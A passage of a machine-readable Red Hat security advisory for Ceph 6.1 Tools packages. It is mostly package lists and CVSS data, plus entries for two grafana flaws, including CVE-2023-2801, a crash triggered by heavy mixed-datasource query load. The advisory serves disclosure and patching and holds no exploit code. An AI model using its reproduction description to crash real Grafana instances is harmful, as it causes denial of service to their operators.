"9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:7740" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "products": [ "9Base-RHCEPH-6.1-Tools:ceph-2:17.2.6-167.el9cp.src", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mib-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-resource-agents-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephadm-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.src", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephfs-top-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "grafana: missing access control allows test alerts by underprivileged user" }, { "acknowledgments": [ { "names": [ "Grafana Security Team" ], "summary": "Acknowledged by upstream." } ], "cve": "CVE-2023-2801", "cwe": { "id": "CWE-820", "name": "Missing Synchronization" }, "discovery_date": "2023-05-29T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2210840" } ], "notes": [ { "category": "description", "text": "A flaw was found in grafana. This issue occurs when sending an API call to the /ds/query or public dashboard query endpoint that has mixed queries, such as having two or more distinct data sources in one API call. As a result, the Grafana instance will crash. Currently, the only feature that uses mixed queries within Grafana is public dashboards, but it is also possible to trigger this issue by calling the API directly.\r\nIf public dashboards are enabled, reproduction requires a public dashboard to be under a heavy load. If public dashboards are disabled, reproduction only occurs when the /ds/query endpoint with a mixed query payload is under a heavy load with a load testing script.", "title": "Vulnerability description" }, { "category": "summary", "text": "grafana: data source proxy race condition", "title": "Vulnerability summary" }, { "category": "other", "text": "- In OpenShift Container Platform (OCP), Red Hat Advanced Cluster Management for Kubernetes (RHACM), and OpenShift ServiceMesh (OSSM) the grafana components are protected by OpenShift OAuth that reduces the impact of this flaw to Moderate.\n- OpenShift ServiceMesh (OSSM) has switched to using upstream rhel rpms for grafana and is no longer maintaining the servicemesh-grafana package. Hence, it is marked as affected/won\u0027tfix.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "9Base-RHCEPH-6.1-Tools:ceph-2:17.2.6-167.el9cp.src", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mib-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-resource-agents-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephadm-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.src", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephfs-top-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le", 